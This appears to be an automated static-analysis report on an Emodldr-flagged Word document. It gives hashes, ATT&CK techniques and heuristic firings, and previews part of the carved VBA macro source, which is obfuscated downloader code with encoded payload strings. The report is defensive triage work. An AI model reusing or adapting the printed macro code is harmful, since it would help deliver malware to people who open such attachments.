Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b964eb36b94ac927…

MALICIOUS

Office (OLE)

174.5 KB Created: 2018-03-28 14:52:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: df651bfd0205a7accbb172e6f4c2dcf8 SHA-1: a465adc7a1660b5f6e9997b8a0093d99f245d5ec SHA-256: b964eb36b94ac927f8e16648faaabd7fd717382de222901ee98184e0e63309cd
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV and exhibits multiple high-severity heuristic firings related to VBA macros, including AutoOpen and CreateObject calls. The VBA script contains obfuscated strings that are likely used to construct a URL for downloading a second-stage payload, a common technique for Emodldr malware. The presence of legacy WordBasic and Excel 4.0 macros further indicates malicious intent.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 53200 bytes
SHA-256: 13452ab03e090249c479975651353498ddd047a1deb030678bc2d382a08cb6eb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 26 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "JwXSvTu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "XQwovwB"
Function WCJokJLHLjwV()
On Error Resume Next
Select Case CWFzpr
      Case 91550
         EJphV = CStr(zviLP + CStr(93159) - lvpFhQ * 74305)
      Case 47725
         uUJGDZ = QZQZvZ
         qiwFBc = Tan(4272 * YzIQa)
End Select
FbwYlRAYm = XkkNM("5t3ADQAOAAxADYAMwBkADcAZQBjADIAMAAwAGMANwA2AGIAYQBiADAANQBkADcAYwBiADMAMQA1ADMAOAA5ADUANQA0AGQAZQBhADEAZQBiADcAOQBmAGEANgA1ADkAYgBhADAAZAA2AGUAYgAwAGMAMgBiAGYAYwBiADMAMwA2AGUAZgA3ADEANgBkADWt7TQj", 4, 186)
Select Case uIbIk
      Case 40927
         UXPwZ = CStr(OlwWp + CStr(23016) - zalLlv * 63884)
      Case 68390
         LwnwfW = pQKEi
         HhGbc = Tan(77244 * ZbTEd)
End Select
Select Case XnJIMw
      Case 11309
         QqkFb = CStr(bOiBV + CStr(62110) - ViRuAI * 60479)
      Case 68519
         jGBIc = CFIwPv
         vtAfl = Tan(95701 * iGVjh)
End Select
ijPwXlilt = XkkNM("caMABlAGQAMAA0ADYAYQA1AGEAZQAyADgAZAAwADIAYQBlAGYAOAA0ADYAYgAwADgAMgAyAGQAMQBlAGIAOABhADkAOQAzADMAZQA4ADUAZABlADkANwBjADEANQBlAGEANAA3ADkANwAzADMAYgOt3DK", 3, 146)
Select Case JrOLo
      Case 50829
         IJiDS = CStr(wMZsWQ + CStr(3868) - iYtVX * 64778)
      Case 30836
         ZlVab = KqzKp
         BlPwM = Tan(20013 * HJNwQ)
End Select
Select Case NoTiH
      Case 86635
         nipBFD = CStr(tBQrFP + CStr(62073) - aokXuc * 30668)
      Case 69707
         ztuNd = KvmjX
         qCGtii = Tan(10008 * GHRfQ)
End Select
TdXkORCJ = XkkNM("HcAMQAyADEAZAAwAGUAZgAxADgAMQA2ADIAYwA0ADcAMwBhADcAMABhAGEAYgAwAGEAMwAxADQAOAAyADgANABkAGQANAA3AGEAMQA0AGQAMQAwAGYANQA2ADAAMAA1ADAANQAzAGIAZQAyADIANQA5AGIAOQA3AGYANQAyADkAZAAzADYAMwAxADkAZAA0ADYAN%aKl", 3, 194)
Select Case fukwS
      Case 44518
         TDMJZQ = CStr(GvSfIH + CStr(69578) - ddMzKW * 31496)
      Case 81277
         OzPmPK = RArXzu
         IOWHKo = Tan(74787 * JdtRG)
End Select
Select Case wjrPf
      Case 90426
         lPqWM = CStr(CYaOo + CStr(82946) - VYsjKs * 85238)
      Case 48583
         JJIPI = PUjVt
         RcqECF = Tan(96634 * ZLPhW)
End Select
jJRTmlPW = XkkNM("u5HGIAYwBlAGYAZAAyAGQAMQA3ADMAYgAwAGEAYQA3ADEAZgAxADQAMgBhADIAZABiAGYAOABlAGEANQBhADkAYwBmAGYAMgA1ADQAMwBiAGIAMQBmADEANAA3ADUAZQAxADkANAAwAGEAMgA2ADkANQBkADQAZQBkADkAMtHbA5", 4, 164)
Select Case aoHEnC
      Case 91710
         GhNzHo = CStr(FhSzE + CStr(7730) - BiHnuF * 64794)
      Case 95833
         asPoaN = iqwnWJ
         EzKKTd = Tan(92981 * Rpfmcz)
End Select
Select Case jDkZR
      Case 74569
         mNOADt = CStr(kWJNIX + CStr(64827) - TmSjS * 96286)
      Case 15579
         MztYF = awdvtC
         QRoAMp = Tan(63312 * lQoob)
End Select
LGaAtYwhV = XkkNM("BSd1AYwA2AGQAMgA0AGQAOQBmADQAMgAyAGQAYgA1ADMAMwBkADUAMAA1ADYAYQA4ADQANwA2ADUAYwBmAGUAYgA5ADQAMgA1AGUAZABhADgAMQBjADQAYwA2AGIAMAA5ADEAMwBkADcANQBhADv,i3", 5, 143)
Select Case wHiTzi
      Case 18129
         BJVqu = CStr(KjMifa + CStr(6688) - iiGIb * 79798)
      Case 53399
         FjdGcr = cwXYOQ
         fVvkEB = Tan(8684 * IAjdc)
End Select
Select Case wBHZKb
      Case 8617
         AOKTZ = CStr(ibnwli + CStr(14808) - oITiZ * 89169)
      Case 93464
         RwBOzp = DlBYn
         liolDi = Tan(87447 * vkvfc)
End Select
SWhSrGiV = XkkNM("kn810AGUAYgA0AGIANwBiADUAZgAAs", 5, 23)
Select Case wFbBK
      Case 55109
         zMSLj = CStr(KkNjGU + CStr(75703) - ifzWP * 6023)
      Case 33162
         NFiXc = zKAOK
         nSVaW = Tan(73012 * fiApLp)
End Select
Select Case JCsAY
      Case 75377
         ctHvT = CStr(QXqFY + CStr(82845) - fzZhL * 87317)
      Case 72361
         wbICX = HsPQir
         dXfqd = Tan(67750 * ZCLwX)
End Select
FmOmZifaZO = XkkNM("CCdABlADYANQA2AGQAMgAzADQANgBiAGIAMQXFq%b", 4, 33)
Select Case rMcKp
      Case 60599
         jdRzs = CStr(qJfaop + CStr(99938) - CatrhK * 51616)

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.